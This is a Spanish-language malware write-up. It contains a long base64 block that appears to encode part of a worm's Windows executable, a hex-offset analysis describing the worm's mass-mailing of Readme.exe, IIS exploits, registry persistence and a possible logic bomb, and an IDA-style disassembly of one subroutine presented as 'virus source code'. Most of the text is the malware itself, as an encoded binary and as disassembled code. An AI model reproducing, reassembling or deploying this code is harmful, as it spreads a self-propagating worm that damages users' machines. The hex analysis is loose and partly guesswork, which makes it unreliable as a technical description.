p6cKCgrrp6cKhYWnp4qKioqKivP09PP09PPz8/PzG/PzGxsbGxsbvBISCgoKCgoEp6cKCgoKCgqn i4usrM7Ozs7OzoqKivTz8/Tz8xsb8xsb8xsbGxsbvBISCgoK6+unBAQKZmaGp6eLzs7Ozs7Ozs7O zs7Ozor09PP09PPzG/PzGxsbGxsbvBISCgoK6+unBAQKZmaGp6eLzs7Ozs7Ozs7Ozs7Ozor09PP0 9PPzG/PzGxsbGxsbvBISCgoK6uqtpqZmhYWni4vOzs6srKysrM7Ozs7Ozs6KivTz8/Pz8xsbGxsb GxsbvBISCgoK6uoDra2Gp6eLrKzOrKz29vb29qfOzs7OzrLOzor09PPz8/PzGxsbGxsbvBISCgoK 6upzzs6nhoaLzs6s9vb29vb29vaFhc6ysrLT04rz8/T08xsb8xsbGxsbvBISCgoK6upzzs6nhoaL zs6s9vb29vb29vaFhc6ysrLT04rz8/T08xsb8xsbGxsbvBISCgoK6+t0AwOtp6eLzs6s9vb29vb2 9vb29vb29vb29vP09PPz9PPzG/PzGxsbvBISCgoK6+uZdHTPi4uszs6srKysrKysrKysrKysrKys rKz09PT09PPz8/PzGxsbvBISCgoKCgrrmZntrKzOzs7Ozs7Ozs6zs7Ozs9PT09PT06z29vT08/T0 8xsb8xsbvBISCgoKCgrrmZntrKzOzs7Ozs7Ozs6zs7Ozs9PT09PT06z29vT08/T08xsb8xsbvBIS CgoKCgqnc3Oazs7OrKysrKysrKysrKysrKzZ2dnT06z09PT09PPz8/PzGxsbvBISCgoKCgqnc3Oa zs7OrKysrKysrKysrKysrKzZ2dnT06z09PT09PPz8/PzGxsbvBISCgoKCgoKhoaRoKDOrKys9vb2 9vb29vaFhazo6NnT06z29vT09PT08/Pz8xsbvBISCgoKCgoKp6eGkZGgzs6srKz29vb29oWsrLPh 4eisrPb09Pb29PPz9PPzGxsbvBISCgoKCgoKp6eGkZGgzs6srKz29vb29oWsrLPh4eisrPb09Pb2 9PPz9PPzGxsbvBISCgoKCgoKCgqnrKy07++srKynp6enp6yzs9no6NOsrPb29vT09PT08/Pz8xsb vBISCgoKCgoKCgoKp6esrKy7zs7Ozs7OzrPT07PT06z29vb09Pb29PT09PPz8/PzvBISCgoKCgoK CgoKCgqnrKzOzs7Ozs7Ozs6zs9OsrPb29s729vT09vT09PPz87y8BxISCgoKCgoKCgoKCgqnrKzO zs7Ozs7Ozs6zs9OsrPb29s729vT09vT09PPz87y8BxISCgoKCgoKCgoKCgrrCgqsrKysrKysrKys rKz29vb29qz29vb29PT09PPzvAcHkhISCgoKCgoKCgoKCgrrCgr29vb29vasrKysrPb29vasrAr2 9vT09vT087y8B5KSkhISCgoKCgoKCgoKCgrrCgr29vb29vb29vasrKysrKz29vb29vb29PPzvAcH kpKS6xISCgoKCgoKCgoKCgrrCgr29vb29vb29vasrKysrKz29vb29vb29PPzvAcHkpKS6xISCgoK CgoKCgoKCgrrCgr29vb29vb29vb29vb29vb29vb29vb29hISQ0NDQ0NDQ0NDCgoKCgoKCgoKCgrr Cgr29vb29vb29vb29vb29vb29vb29vb29pKSChsbvJKSEgoKCgoKCgoKCgoKCgrrCgr29vb29vb2 9vb29vb29vb29vb29vb29pKSChsbvJKSEgoKCgoKCgoKCgoKCgrrCgr29vb29vb29vb29vb29vb2 9vb29vb29pKSG7y8khISCgoKCgoKCgoKCgoKCgrrCgr29vb29vb29vb29vb29vb29vb29vb29pKS vJKSEgoKCgoKCgoKCgoKCgoKCgrrCgr29vb29vb29vb29vb29vb29vb29vb29pKSkhISCgoKCgoK CgoKCgoKCgoKCgrrCgr29vb29vb29vb29vb29vb29vb29vb29pKSkhISCgoKCgoKCgoKCgoKCgoK CgrrCgr29vb29vb29vb29vb29vb29vb29vb29pKSkhISCgoKCgoKCgoKCgoKCgoKCgrrCgoKCgoK CgoKCgoKCgoKCgoKCgoKCgoKCpKSEgoKCgoKCgoKCgoKCgoKCgoKCgrr7Ozs7Ozs7Ozs7Ozs7Ozs 7Ozs7Ozs7Ozs7OzsCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoK CgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoK CgoKCgoK////////SUz/AAAAAAdGSf8AAAAAB3hF/wAAAAAHAEn/AAAAAAdfTf8AAAAAB0Ux/2AA AAAHMUb/YAAAAAdfRv9gAAAAB1Vf4GAAAAAHeEXgYAAAAAcASccAAAAAB19DxwAAAAAHeEUEAAAA AAcASQQAAAAAB19DAAAAAAAHTEwAAAAAAAcxAAAAAAAAB0VEAAAAAAAHWQAAAAAAAAcAAQAAAAAA B0RJwAAAAAAHMHjAAAAAAAcAAMAAAAAAB1RfwAAAAAAHeEXgAAAAAAcASeAAAAAAB19Q4AAAAAAH eEX4AAAAAAcASfwAAAAAB19Q/wAAAAAHSU7/AAAAAAcyNv9gAAAAB19F/2AACAAHU1T/YAAAAAdJ Qf9gAAAABzI3/2AAAAAHX0X/YAAACB9QRf9gAAAIHzEy/2AAAAA/RF//YAAAAP9FUP9gAAAB/3hF /2AAAAH/AEn/YAAAAf9fU/9////H/0FM/wAAAA//MkH///////9fRf///////0RPKAAAACAAAABA AAAAAQABAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD///8AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD///// /AAAA/3///v9///7/f//+/3///vh///7zAH/+8wAf/uIAD/7gAAf+4A4T/ugfO/7oH//+7AAD/vY D+/72ADv++x87/vmOd/78wPf+/iHv/v8A2/7/QDv+/3x3/v9/D/z/f/+A/3///f9///v/f//3/3/ /7/9//9//f///05QQUQAAAEABQAQEBAAAQAEACgBAAABACAgEAABAAQA6AIAAAIAICAAAAEACACo CAAAAwAwMAAAAQAIAKgOAAAEACAgAgABAAEAMAEAAAUAUEFERElOR1hYUEFERElOR1BBRERJTkdY WFBBRERJTkdQQURESU5HWFhQQURESU5HUEFERElOR1hYUEFERElOR1BBRERJTkdYWFBBRERJTkdQ QURESU5HWFhQQURESU5HUEFERElOR1hYUEFERElOR1BBRERJTkdYWFBBRERJTkdQQURESU5HWFhQ QURESU5HUEFERElOR1hYUEFERElOR1BBRERJTkdYWFBBRERJTkdQQURESU5HWFhQQURESU5HUEFE RElOR1hYUEFERElOR1BBRERJTkdYWFBBRERJTkdQQURESU5HWFhQQURESU5HUEFERElOR1hYUEFE RElOR1BBRERJTkdYWFBBRERJTkdQQURESU5HWFhQQURESU5HUEFERElOR1hYUEFERElOR1BBRERJ TkdYWFBBRERJTkdQQURESU5HWFhQQURESU5HUEFERElOR1hYUEFERElOR1BBRERJTkdYWFBBRERJ TkdQQURESU5HWAAQAAA0AQAAJTBDMFEwXzBtMJwwqDDnMPYwCjEVMSYxZzGGMaAx2DHvMQcyaTJz MoEylDKxMsIy/DJJM1YzZDNzM58zETQZNG00mDThNGk1gDXKNeM1+jURNlk2fjaJNp42yjYCNx83 LjdIN3s3nDeoN7E3xjfRN+43/TcdOD44SjhgOGU4qDi2OMk42jj/OBY5ITlAOVc5kzm4Oc459TkB OiE6WzpkOm86kjqkOr86yDrfOvA6CDsZO087VTtrO387iTudO7k7xjvhOwo8gTyWPKM8ujzePO48 Jj0yPTg9RT1PPV49aj2JPac90j33PQw+Ij4pPi4+RT5ePo8+nT6/PtA+1T7ePuk+8z76Phc/Hz8p PzA/NT9AP00/VD9dP3w/gj+JP5U/oz+vP80/1j/eP+0/ACAAAPgBAAACMBAwHzAnMC8wQzCGMJEw oTCqML4wzzDkMOow9zD8MAExCjERMRoxITEqMTExOjFBMUoxWTFxMXYxfTGdMbIxvzHxMScySzKa MqAysjLEMgAzLTM0M1MzYTO0M/gz/zMZNC40OTQ/NFE0WTRjNG80dTR8NIU0izSoNK40xzTXNNw0 7DTxNAE1BjUXNRw1LDUxNUQ1STVaNV81cDV1NYU1ijWaNZ81rzW0Ncc1zDXcNeE18TX2NQY2CzYc Niw2MTZENkk2WTZeNm82gDaQNpU2pTaqNr02wjbSNtc25zbsNvw2ATcRNxY3JjcrNz43QzdTN1g3 aDdtN303gjeSN5c3pzesN783xDfUN9k36TfuN/43AzgTOBg4KDgtOEA4RThVOFo4ajhvOH84hDiU OJk4qTiuOME4xjjWONs46zjwOAA5BTkVORo5KjkvOUI5RzlXOVw5bDlxOYE5hjmWOZs5rDmyObc5 vTnCOcc50jnYOd454znoOfY5/DoJOzg7QTtfO2g7djt/O5c7ozvEO/Y7EzxUPGQ8pjzZPP08DD0c PTQ9ij2SPbM9uT2/PcU90T3cPeI96T3vPQU+Mj5VPn4+iT6nPrw+xj7NPtQ+2z7iPuk+8D73Pv4+ BT8MPxM/Gj8hPyg/Lz9RP1g/cT/pP/A/ADAAADwBAAAJMBwwJzAzMD8wWDB9MIQwGzGgMbEx0jHn MR0yPDJXMnQyrzLGMtcy6jIwM0kzazN+M8UzyzPhM/Mz/TMPNCs0NjRCNFU0ezSLNMw07DQMNSw1 PjVQNWI1cTWjNbI1vTXWNeM16TUuNjQ2SDZnNm42fTaDNqU2zTbiNvs2Hjc/N1E3VjehN643uDe+ N9436DcDOA04EzgbOCE4LTg6OEY4TDhxOMI45Tj4OAY5GTkyOUQ5TzlUOVo5bTl2OYk5jzmnObE5 yzneOfk5DjodOjI6GjskO5k7Gjw1PD88TTxgPGY8eTyPPJ48pTy0PNY85jz1PP08Az0SPRg9Mj1P PWg9hT2PPZU9rD2+PeU99j0OPiI+LD5APlE+Vz5pPnY+kT66PgE/Jj82P1c/dT+jP8g/9j8AAABA AABYAgAAGTAuMDswUjB2MIYwtTC/MMUwyzAyMTcxPTFRMVcxZDFvMXYxfzGZMbQxxDHVMeox7zEA MisyMDI2MkEyVTJgMoEynDKlMqwy3zLvMvYyLjM/M1YzXDNrM4QzjTOrM7Yz0jPpM/AzDDQSNCQ0 OTRLNGE0djSDNIk0njSrNNQ02jTkNPU0+zQCNRY1LjU3NUo1UDV1NXs1kzWpNbA1wTXSNdg14zXx NRQ2RjZrNqY24DYSNzc3fTeIN443tze9N9U36jfvNxA4LTg0OEE4TjhnOHc4fzieOK44tDjVONw4 6DjuOAU5EjkgOSg5LTk8OUQ5UDlYOWQ5bDl5OX85ijmTOao5tjnKOdM55jkiOjM6PTpCOks6Vzpc OmQ6aTpvOnY6ezqBOog6jTqTOpo6nzqlOq06szq6OsA6xzrMOtI62TreOuQ66zrwOvY6/ToCOwg7 DzsWOxw7IzsoOzE7PztHO0w7VTtcO2Q7aTtvO3Y7ezuBO4g7jTuTO5o7nzulO6w7sTu6O8E7yTvO O9Q72zvgO+Y77TvyO/g7/zsEPAo8ETwWPBw8IzwoPC48NTw6PEM8TjxWPFs8YTxoPG08czx6PH88 hTyMPJE8lzyePKM8qTywPLU8uzzCPMc8zTzUPNk83zzmPOs88Tz4PP08Az0KPQ89FT0cPSE9Jz0u PTM9OT1APUU9Sz1SPVc9XT1kPWk9bz12PXs9gT2IPY09kz2aPZ89pT2sPbE9tz2+Pck90D3cPeg9 9D0APhw+Lj5KPnY+yj7QPug+FT8uP0o/XD9tPwBQAAA8AQAAOjBFMFoweDCYMNAw7TD9MAsxGjEp MUQxezGqMbcxzzHlMfQxBjIVMiYyNzJNMmQyijKZMqcyrTLEMs8y1zISMxgzKjMHNCE0KjRANEY0 TzSgNNU04zT6NAs1LTVCNVI1WzVvNXk1pzWyNco10zXcNQ42FDYmNkk2UzZlNoA2izakNtY2EDcw N2I3kDeiN643tDfnN/Y3ETgXOCU4OjhFOFI4CDkOOSo5NzlQOXA5sjm4OcI50zntOfk5AjoTOjc6 PTpGOk46WDphOm06dTp8Oo46lDqdOsQ67ToDOzs7TDtvO4k7mjvQO+07AzwOPE48WTxrPLI8Dj1O PXk9qT3vPfU9Cz4aPis+MT5RPl4+Zj5sPnc+kj6aPqU+5T4RPx0/NT8+P1c/Xz9wP5k/uj/EP/U/ AAAAYAAApAEAABow2jDgMPwwHjE0MU4xVzGbMaExqzHDMWIyezKUMv8yFjMuM14zZDNrM4MzlDOa M6IzsTPTM9kz3zPuM/4zBDQPNDE0NzRCNEg0VjReNGU0ajRwNIY0jTSUNK80ujTANNI03zTnNPY0 AjUpNT41RjVSNVo1aTV2NXw1hzWQNZ01ozWoNa41tDW5Nb818jX5NQQ2ITZuNpM2uzbENsk2zzbW Nts26jbwNvw2BDcJNyk3NTdYN203eDeGN5A3njeoN7M3vjfcN+E35zfyN/g3CTgVOBo4OzhGOEs4 UjhXOF04YziBOJc4ozitOLc4zzjrOPo4BDkZOSA5RjlMOVs5ZDl2OYA5kjmkOao5tTnFOeU59DkA OgY6EDovOoc6lTrGOgY7DjsWOyg7ODs+O207hjujO7w7AjwTPCE8Ljw5PEA8XzxxPH88ljycPKI8 uTzHPNw84TzmPOw8+DwGPSs9MT15PZE9lz2uPeM98D0GPhU+Vj5cPnI+eD6BPqM+sz67PtQ+Gz8j Pzs/Qj9NP1Q/ej+FP5Q/rD+3P+4/AAAAcAAAmAAAABMwdjB+MJcwnTCiMMcwzTDgMO4w9TD7MAEx BzEgMScxNDFLMWQxajF+MZgxqDHRMSMyQjJgMnQykzKxMuoyATMZMyUzNzNJM3QzezODM4kzjjOT M8UzyzPRM9cz5jPsM/Iz+DP+MwQ0EjQaNCA0KzQ4NEA0TjRTNFg0XTRoNHU0fzSUNKA0pjTINNo0 NjVSNQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAA= --====_ABC1234567890DEF_==== --------------9320CF73DE613805C122C17B-- --------------9A3F1BA411407BCA09D153B0-- #################################TERMINA################################# [ANALISIS HEXADECIMAL] 1.- 00000040 0e1f ba0e 00b4 09cd 21b8 014c cd21 5468 - 00000070 6d6f 6465 2e0d 0d0a 2400 0000 0000 0000 Este programa no corre en modo de DOS 2.- 000001d0 2e74 6578 7400 0000 5665 0000 0010 0000 - 00000290 0000 0000 4000 0042 0000 0000 0000 0000 Iniciado de subrutina para alocacion de texto en el cuerpo del virus 3.- 000002a0 - 00000ff0 Rutina de cargado de buffer escondida por compilador 4.- 00001000 - 00007550 Rutina primaria escondida por compilador, determinacion de memoria y Seguimiento de errores. MITAD DEL VIRUS 5.- 00007560 - 00007ff0 Rutina de cargado de buffer comun en programas de C. 6.- 00008350 6283 0000 0000 0000 C102 7374 726E 6370 00008360 7900 9902 6d65 6d73 6574 0000 ba02 7374 Memtest Seguimiento de errores Strings inciales 7.- 00008470 6f69 6e74 6572 0000 3400 4372 6561 7465 - 00008860 7269 7661 7465 5072 6f66 696c 6553 7472 De la linea anterior a esta tenemos seguimiento de errores Creacion de symlinks Atributos de archivo BUscado de archivos Primarios Escritura de Procesos en memoria Obtencion de datos de la maquina Obtencion de interfaces de red Creacion de Threaths Cerrado de recursos Buscado de recursos Creacion de nuevos recursos Obtencion de filas de borrado de archivos Lineas de sustitucion de archivos Destruccion de Procesos y de archivos 8.- 00008870 696e 6741 0000 4b45 524e 454c 3332 2e64 00008920 5049 3332 2e64 6c6c 0000 0000 0000 0000 PRIMERA PARTE CRITICA DEL VIRUS Buscado de sentencias a kernel 32 para su sobreescritura asi como implementacion de llaves Entrada en ADVAPI312.DLL 9.- 00008930 0000 0000 0000 0000 0000 0000 0000 0000 - 00007ff0 0000 0000 0000 0000 0000 0000 0000 0000 Cargado de buffer encriptado por compilador Inicio de la subrutina 10.- 00008000 d888 0000 0a89 0000 f888 0000 e888 0000 - 00008340 8a83 0000 8083 0000 7683 0000 6c83 0000 Encriptado por compilador Inicia la nueva carga de el Kernel32.dll para entrar en registros.Mediante Regedit 11.- 00008360 7900 9902 6d65 6d73 6574 726c 656e 0000 - 00008920 5049 3332 2e64 6c6c 0000 0000 0000 0000 Repeticion de la rutina tratada en el numero 7 con mas variables para edicion de registros y permanencia del virus en memoria. 12.- 00008930 0000 0000 0000 0000 0000 0000 0000 0000 - 00009000 0000 0000 0000 0000 0000 0000 0000 0000 Buffer loaded Esconida por compilador. SEGUNDA PARTE CRITICA 13.- 00009010 2e00 0000 5379 7374 656d 5c43 7572 7265 - 000095d0 706c 6f72 6572 5c41 6476 616e 6365 6400 Creacion de Readme.exe asi como de su implantacion en el mail Buscado de subrutinas de internet explorer Buscado de subrutinas de Windows NT Buscado de subrutinas de Windows 9.X BUscado de creadores de codigo hexadecimal para redaccion de el readme.exe al correo electronico Edicion de Windows Current version explorer advanded Mas rutinas......... TERCERA PARTE CRITICA DEL VIRUS 14.- 000095e0 256c 7300 5c5c 2573 0000 0000 256c 6420 - 0000a400 6500 0000 5c5c 0000 6f63 7465 7400 0000 Es aqui donde encontramos las exploits a IIS asi como las entradas en memoria, lo que escribira el virus en caso de ser ejecutado y demas Usado de los MAPI [MUY IMPORTANTE] Tambien es aqui donde encontramos la cadena que nos dice su origen y contra que va este virus. ||||||fuck USA Government|||||| ||||||fuck PoizonBOx|||||| ||||||contact: sysadmcn@yahoo.com.cn|||||| Entradas en microsoft Internet explorer Entradas en microsoft outlook Edicion de Admin.dll Busqueda del mismo en posibles arreglos de discos c:, e:, f:, etc. Entradas en los octetos de salida de Explorer Sustitucion de kernel32.exe por Readme.exe 15.- 0000a410 - 0000aff0 Escondido por compilador Buffer loaded 16.- 0000b000 0000 0000 44b9 211f 0400 0000 0000 0300 - 0000cd00 ffff ffff ffff 444f 2800 0000 2000 0000 Seteado de relog interno Posible fin : Bombda logica 17.- 0000ce80 0100 3001 0000 0500 5041 4444 494e 4758 0000cff0 5850 4144 4449 4e47 5041 4444 494e 4758 LA CADENA XPADDINGPADDINGX Principal 18.- 0000d000 0010 0000 3401 0000 2530 4330 5130 5f30 - 0000da30 c834 da34 3635 5235 0000 0000 0000 0000 Cerrado de rutinas y reiniciacion de los procesos 19.- 00000000 4d5a 9000 0300 0000 0400 0000 ffff 0000 - INICIO DE PROGRAMA 0000dff0 0000 0000 0000 0000 0000 0000 0000 0000 FIN DE PROGRAMA CUERPO COMPLETO DEL VIRUS [VIRUS SOURCE CODE] +[DEBUGGER SOURCE] ##############INICIA################### 36171000 36171000 model flat 36171000 36171000 ; ═══════════════════════════════════════════════════════════════════════════ 36171000 36171000 ; Segment type: Pure code 36171000 _text segment para public 'CODE' use32 36171000 assume cs:_text 36171000 ;org 36171000h 36171000 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing 36171000 36171000 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36171000 36171000 ; This worm seems to be written in some HLL, probably C. This can be evidenced by the 36171000 ; way the stack frame is set up within the subroutines. 36171000 ; Attributes: bp-based frame 36171000 36171000 sub_36171000 proc near ; CODE XREF: sub_36175AA9+49p 36171000 36171000 var_74C = word ptr -74Ch 36171000 var_749 = byte ptr -749h 36171000 var_34C = word ptr -34Ch 36171000 var_34A = byte ptr -34Ah 36171000 var_349 = byte ptr -349h 36171000 var_348 = word ptr -348h 36171000 var_346 = word ptr -346h 36171000 var_344 = word ptr -344h 36171000 var_342 = word ptr -342h 36171000 var_340 = byte ptr -340h 36171000 var_140 = dword ptr -140h 36171000 var_13C = dword ptr -13Ch 36171000 var_3C = byte ptr -3Ch 36171000 var_2C = byte ptr -2Ch 36171000 var_1C = word ptr -1Ch 36171000 var_1A = word ptr -1Ah 36171000 var_18 = dword ptr -18h 36171000 var_C = dword ptr -0Ch 36171000 var_4 = dword ptr -4 36171000 arg_0 = dword ptr 8 36171000 arg_4 = dword ptr 0Ch 36171000 arg_8 = dword ptr 10h 36171000 36171000 push ebp 36171001 mov ebp, esp 36171003 sub esp, 74Ch 36171009 push ebx 3617100A push esi 3617100B push edi 3617100C xor edi, edi 3617100E push 20Ch 36171013 lea eax, [ebp-34Ch] 36171019 push edi 3617101A push eax 3617101B call _memset 36171020 add esp, 0Ch 36171023 call ds:GetCurrentThreadId 36171029 and byte ptr [ebp-349h], 7Fh 36171030 push 1 36171032 pop ebx 36171033 mov [ebp-34Ch], ax 3617103A push ebx 3617103B mov [ebp-34Ah], bl 36171041 call dword_3617AC38 36171047 push edi 36171048 mov [ebp-348h], ax 3617104F call dword_3617AC38 36171055 push edi 36171056 mov [ebp-346h], ax 3617105D call dword_3617AC38 36171063 push edi 36171064 mov [ebp-342h], ax 3617106B call dword_3617AC38 36171071 push dword ptr [ebp+8] 36171074 mov [ebp-344h], ax 3617107B lea eax, [ebp-340h] 36171081 push eax 36171082 call sub_36171289 36171087 pop ecx 36171088 cmp eax, edi 3617108A pop ecx 3617108B jl loc_36171119 36171091 push 0Fh 36171093 lea esi, [ebp+eax-340h] 3617109A call dword_3617AC38 361710A0 mov [esi], ax 361710A3 inc esi 361710A4 push ebx 361710A5 inc esi 361710A6 call dword_3617AC38 361710AC mov [esi], ax 361710AF lea eax, [ebp-34Ch] 361710B5 sub esi, eax 361710B7 push 10h 361710B9 inc esi 361710BA lea eax, [ebp-1Ch] 361710BD inc esi 361710BE push edi 361710BF push eax 361710C0 mov [ebp-4], esi 361710C3 call _memset 361710C8 push 10h 361710CA lea eax, [ebp-2Ch] 361710CD push edi 361710CE push eax 361710CF call _memset 361710D4 mov eax, [ebp+0Ch] 361710D7 add esp, 18h 361710DA mov word ptr [ebp-1Ch], 2 361710E0 mov [ebp-18h], eax 361710E3 push 35h 361710E5 call dword_3617AC38 361710EB push edi 361710EC push 2 361710EE push 2 361710F0 mov [ebp-1Ah], ax 361710F4 call dword_3617AC5C 361710FA mov esi, eax 361710FC cmp esi, 0FFFFFFFFh 361710FF jz short loc_36171119 36171101 lea eax, [ebp-1Ch] 36171104 push 10h 36171106 push eax 36171107 push esi 36171108 call dword_3617AC58 3617110E test eax, eax 36171110 jz short loc_36171132 36171112 push esi 36171113 call dword_3617AC3C 36171119 36171119 loc_36171119: ; CODE XREF: sub_36171000+8Bj 36171119 ; sub_36171000+FFj 36171119 push 100h 3617111E push dword ptr [ebp+8] 36171121 push dword ptr [ebp+10h] 36171124 call ds:strncpy 3617112A add esp, 0Ch 3617112D jmp loc_36171277 36171132 ; ─────────────────────────────────────────────────────────────────────────── 36171132 36171132 loc_36171132: ; CODE XREF: sub_36171000+110j 36171132 mov [ebp+arg_4], edi 36171135 36171135 loc_36171135: ; CODE XREF: sub_36171000+256j 36171135 push 8 36171137 lea eax, [ebp+var_C] 3617113A push edi 3617113B push eax 3617113C call _memset 36171141 add esp, 0Ch 36171144 lea eax, [ebp+var_C] 36171147 mov [ebp+var_C], 1Eh 3617114E mov [ebp+var_13C], esi 36171154 push eax 36171155 lea eax, [ebp+var_140] 3617115B push edi 3617115C push eax 3617115D push edi 3617115E push edi 3617115F mov [ebp+var_140], ebx 36171165 call dword_3617AC40 3617116B cmp eax, edi 3617116D jz loc_3617124F 36171173 cmp eax, 0FFFFFFFFh 36171176 jz loc_3617124F 3617117C lea eax, [ebp+var_140] 36171182 push eax 36171183 push esi 36171184 call dword_3617AC60 3617118A test eax, eax 3617118C jz loc_3617124F 36171192 push edi 36171193 lea eax, [ebp+var_34C] 36171199 push [ebp+var_4] 3617119C push eax 3617119D push esi 3617119E call dword_3617AC48 361711A4 cmp eax, [ebp+var_4] 361711A7 jnz loc_3617124F 361711AD push 10h 361711AF lea eax, [ebp+var_3C] 361711B2 push edi 361711B3 push eax 361711B4 call _memset 361711B9 add esp, 0Ch 361711BC lea eax, [ebp+var_C] 361711BF mov [ebp+var_13C], esi 361711C5 mov [ebp+var_140], ebx 361711CB push eax 361711CC push edi 361711CD lea eax, [ebp+var_140] 361711D3 push edi 361711D4 push eax 361711D5 push edi 361711D6 call dword_3617AC40 361711DC cmp eax, edi 361711DE jz short loc_3617124F 361711E0 cmp eax, 0FFFFFFFFh 361711E3 jz short loc_3617124F 361711E5 lea eax, [ebp+var_140] 361711EB push eax 361711EC push esi 361711ED call dword_3617AC60 361711F3 test eax, eax 361711F5 jz short loc_3617124F 361711F7 push edi 361711F8 lea eax, [ebp+var_74C] 361711FE push 400h 36171203 push eax 36171204 push esi 36171205 call dword_3617AC50 3617120B cmp eax, 0Ch 3617120E jb short loc_3617124F 36171210 mov ax, [ebp+var_74C] 36171217 cmp ax, [ebp+var_34C] 3617121E jnz short loc_3617124F 36171220 test [ebp+var_34A], bl 36171226 jz short loc_36171231 36171228 test [ebp+var_749], 80h 3617122F jz short loc_3617125C 36171231 36171231 loc_36171231: ; CODE XREF: sub_36171000+226j 36171231 test [ebp+var_34A], 2 36171238 jnz short loc_3617125C 3617123A push [ebp+arg_8] 3617123D lea eax, [ebp+var_74C] 36171243 push eax 36171244 call sub_3617131A 36171249 pop ecx 3617124A test eax, eax 3617124C pop ecx 3617124D jnz short loc_3617127E 3617124F 3617124F loc_3617124F: ; CODE XREF: sub_36171000+16Dj 3617124F ; sub_36171000+176j ... 3617124F inc [ebp+arg_4] 36171252 cmp [ebp+arg_4], 4 36171256 jl loc_36171135 3617125C 3617125C loc_3617125C: ; CODE XREF: sub_36171000+22Fj 3617125C ; sub_36171000+238j 3617125C push 100h 36171261 push [ebp+arg_0] 36171264 push [ebp+arg_8] 36171267 call ds:strncpy 3617126D add esp, 0Ch 36171270 push esi 36171271 call dword_3617AC3C 36171277 36171277 loc_36171277: ; CODE XREF: sub_36171000+12Dj 36171277 xor eax, eax 36171279 36171279 loc_36171279: ; CODE XREF: sub_36171000+287j 36171279 pop edi 3617127A pop esi 3617127B pop ebx 3617127C leave 3617127D retn 3617127E ; ─────────────────────────────────────────────────────────────────────────── 3617127E 3617127E loc_3617127E: ; CODE XREF: sub_36171000+24Dj 3617127E push esi 3617127F call dword_3617AC3C 36171285 mov eax, ebx 36171287 jmp short loc_36171279 36171287 sub_36171000 endp 